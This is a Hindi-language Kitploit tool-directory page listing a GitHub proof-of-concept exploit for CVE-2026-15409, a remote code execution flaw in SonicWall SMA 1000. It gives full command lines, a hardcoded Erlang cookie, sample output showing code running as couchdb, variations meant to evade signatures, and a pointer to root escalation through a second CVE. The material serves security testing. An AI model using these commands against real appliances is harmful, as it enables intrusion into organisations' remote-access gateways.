Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/remmons-r7/rapid7-cve-2026-15409
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubremmons-r7/rapid7-cve-2026-15409

rapid7-CVE-2026-15409

रिपॉजिटरी देखें
266491 महीना पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

इस रिपोर्ट में CVE-2026-15409 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट शामिल है। यह SonicWall SMA 1000 पर गैर-रूट रिमोट कोड निष्पादन स्थापित करता है, localhost:1050 द्वारा अपेक्षित Erlang प्रोटोकॉल को लागू करके और फ़ाइल पढ़ने/लिखने और RPC कॉल के माध्यम से मनमाना कोड निष्पादन के लिए इसे वेबसॉकेट के माध्यम से टनल करता है।

साझा करें

CVE-2026-15409

इस रिपॉजिटरी में CVE-2026-15409 के लिए एक proof-of-concept एक्सप्लॉइट है। यह localhost:1050 द्वारा अपेक्षित Erlang प्रोटोकॉल को लागू करके और इसे वेबसॉकेट के माध्यम से टनल करके SonicWall SMA 1000 पर गैर-रूट रिमोट कोड निष्पादन स्थापित करता है, फ़ाइल r/w और RPC कॉल के माध्यम से मनमाना कोड निष्पादन के लिए।

उपयोग

root@kitploit:~
# python3 cve-2026-15409.py --ws-url 'wss://192.168.1.46/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050' --ws-user-agent 'SMA Connect Agent' --ws-insecure-tls --exec 'whoami && id && pwd && hostname'
Authenticated to [email protected]
Peer flags: 0xd07df7fbd
Peer creation: 1784069352
RPC os:cmd/1 => couchdb
uid=1010(couchdb) gid=1(daemon) groups=1(daemon)
/opt/couchdb
SMAAppliance.sma

शोषण और पहचान पर नोट्स

  • यह एक्सप्लॉइट WorkPlace सेवा (आमतौर पर पोर्ट 443 पर सुनती है) को लक्षित करता है, जो लगभग हर समय सक्षम होने की संभावना है (इसके लिए बुनियादी AD जैसी उपयोगकर्ता प्रमाणीकरण विधि स्थापित करने की आवश्यकता है)
  • ex_sra_vm_12.5.0-02002.ova के विरुद्ध विकसित किया गया जिसमें जून 2026 का हॉटफिक्स लागू है (पैच से पहले नवीनतम)
  • Example: python3 cve-2026-15409.py --ws-url 'wss://TARGET_IP_HERE/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050' --ws-user-agent 'SMA Connect Agent' --ws-insecure-tls --cookie 10ecad5b446e86864832904cd439b6b70262 --exec 'touch /var/tmp/remote_code_execution'
  • शोषण के लिए उपयोग किया जाने वाला Erlang नोड कुकी लक्ष्यों में सुसंगत होना चाहिए, यह परीक्षण के आधार पर localhost:1050 पर Erlang प्रक्रिया के लिए हार्डकोडेड है।
  • मनमाना bmID मान आम तौर पर तब तक काम करना चाहिए जब तक मान "-3389" से शुरू होता है। "serviceType=SSH" के विरुद्ध हस्ताक्षर न लिखें, क्योंकि TELNET जैसे विकल्प भी हैं जो काम करते हैं। 0.0.0.0 को वैकल्पिक पता प्रारूपों के लिए भी बदला जा सकता है।
  • पोर्ट 1050 एक शोषण तकनीक है, शोषण के लिए हार्डकोडेड आवश्यकता नहीं। EITW को पोर्ट 8188 को लक्षित करते हुए भी देखा गया था, हालांकि केवल 1050 का उपयोग करना आसान लगता है। अन्य पोर्ट पर भी अन्य सेवाएं हो सकती हैं जिनका शोषण किया जा सकता है। वाइल्ड में कोड निष्पादन संभवतः अन्य उपयोगकर्ता संदर्भों में होगा जो couchdb नहीं हैं, उपयोग की जाने वाली तकनीकों में भिन्नता के कारण।
  • एक शेल स्थापित होने के बाद हमलावर "remove hotfix" xmlrpc ट्रैवर्सल एक्सप्लॉइट CVE-2026-15410 (localhost:8188 को लक्षित करते हुए) के साथ रूट तक विशेषाधिकार वृद्धि कर सकता है।
  • टूल डाउनलोड करें